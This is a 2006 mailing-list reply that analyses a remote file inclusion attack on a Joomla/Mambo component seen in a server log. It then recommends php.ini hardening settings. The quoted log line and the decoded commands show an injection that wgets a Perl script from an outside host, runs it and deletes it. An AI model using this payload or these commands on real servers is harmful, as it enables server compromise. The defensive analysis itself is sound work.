Article 7095 at 06/09/19 20:33:38 From: bq (at mark) solarspeed.net Subject: [coba-e:07095] Re: Odd events for September 19, 2006

Index: [Article Count Order] [Thread]
Date:  Wed, 20 Sep 2006 02:33:17 +0200
From:  Michael Stauber <bq (at mark) solarspeed.net>
Subject:  [coba-e:07095] Re: Odd events for September 19, 2006
To:  coba-e (at mark) bluequartz.org
Message-Id:  <200609200233.17794.bq (at mark) solarspeed.net>
In-Reply-To:  <05d001c6dc3c$1e84b580$02002c0a@WebHoster>
References:  <05d001c6dc3c$1e84b580$02002c0a@WebHoster>
X-Mail-Count: 07095

Hi Gavin,

> Here is what I find in the logs for the same time as the file we found
>
> julia.combios.es - - [15/Sep/2006:13:07:21 +0100] "GET
> /component/option,com_facileforms/components/com_facileforms/facileforms.fr
>ame.php?ff_compath=http://www.kariwuhrer.net/forums/help.gif?&cmd=cd%20/tmp/
>;wget%20http://www.freewebtown.com/al00rs/v6.txt;p?&cmd=cd%20/tmp/;wget%20ht
>t p://www.freewebtown.com/al00rs/v6.txt;perl%20v6.txt;rm%20-rf%20v6*
> HTTP/1.0" 200 11120 "-" "Mozilla/5.0"

They tricked the vulnerable PHP script into executing the following commands:

cd /tmp
wget http://www.freewebtown.com/al00rs/v6.txt
perl v6.txt
rm v6*

To be protected against stuff like that you can reconfigure your php.ini to 
use the following settings:

safe_mode = On
safe_mode_gid = Off
register_globals = Off

That already is a good start and will stop most of these exploits cold in 
their tracks.

There are other configurational options like "safe_mode_exec_dir" or 
"open_basedir" which can be used to lock down PHP further.

Sure, there are PHP scripts which will flat out refuse to run with 
"safe_mode=On" or "register_globals=Off". Some of them can be tweaked to run 
with these settings on the secure side of things. Some can't. 

Usually the scripts which *require* you to configure your server for relaxed 
security are exactly those troublesome scripts that *will* get you hacked. 
Maybe not today or tomorrow, but it's just a matter of time and it will 
happen.

I think I already posted the link to this excellent article more than a dozen 
times to the Cobalt and BQ list, but here it is again:

On the Security of PHP, Part 1 & Part 2
By Jordan Dimov
http://www.developer.com/lang/article.php/918141


Allow me a small personal rant:

Just fire up Google and search for the string "Powered by phpBB 2.0.10". It 
will return 2,240,000 (!!!) results. Each of these results represents a 
vulnerable phpBB2 installation which you can "0wn" by using nothing more 
sophisticated than a web browser and some smarts.

Hence it is no surprise that PHP scripts like Joomla, Mambo, PHPnuke and 
phpBB2 gives me the creeps, as each and any of them has a very colorful 
history of blatant security faults which did lead to thousands of server 
compromises around the world. Partially this is due to bad programming, 
partially it's their widespread usage which makes these scripts so highly 
attractive for wanna-be-hackers. 

Partially it's because the users who install these scripts often forget to 
keep them up to date. Especially phpBB2 frequently releases updates to fix 
all kinds of issues - most of them are important security fixes. 

With the right enforcement of security procedures it is possible to prevent 
such exploits, but I understand that people in the web hosting business often 
are right between a rock and a hard place in that regards: Enforce so much 
security that the client gets uncomfortable and he may take his money 
elsewhere. :o/

-- 

With best regards,

Michael Stauber